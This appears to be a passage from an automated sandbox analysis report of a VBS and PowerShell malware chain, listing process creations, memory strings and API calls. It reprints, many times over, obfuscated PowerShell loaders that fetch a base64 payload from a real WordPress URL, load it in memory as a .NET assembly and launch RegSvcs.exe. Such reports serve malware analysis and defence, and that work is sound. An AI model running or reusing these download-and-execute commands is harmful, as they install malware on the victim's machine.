GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\desktop\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\desktop\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bi gk awb5 gc i 9 c jw w de mw n ds j br g4 dwbt hg i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu hu c bj hm i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu hu c bj hm kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 cwbv gm bqbl hi lw 3 d lw 0 di m y c8 cwbk ge bwbs h dq v hq bgbl hq bgbv gm lqbw hc lwbt g8 yw u ge bgb1 hq cgbv h bwbu g8 aqbj ge bqby g8 zgbu gk lgb3 hc dw v c8 ogbz h d b0 gg jw g cw i k gs bgb3 g0 e g cw i n f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xw t c0 lq t c0 lq t c0 lq t c0 lq t cc l g cq ygbp gs eqbn cw i n de jw s c jwbs g8 z bh cc i p ck ow =';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nupcs = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nupcs).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'roda' ));"
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8O\0
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: RegSvcs.exe, 00000008.00000002.3324391807.000000000128A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerlWindowsPowerShell\v1.0\PowerShell.exeE
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6be
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8O\+
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2w9
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerawJ
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8O\9
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001257000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager=
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager8O\
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001274000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00434C52 cpuid 27_2_00434C52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,27_2_00452036
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_004520C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,27_2_00452313
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,27_2_00448404
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_0045243C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,27_2_00452543
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,27_2_00452610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,27_2_0040F8D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoW,27_2_004488ED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,27_2_00451CD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,27_2_00451F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: EnumSystemLocalesW,27_2_00451F9B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
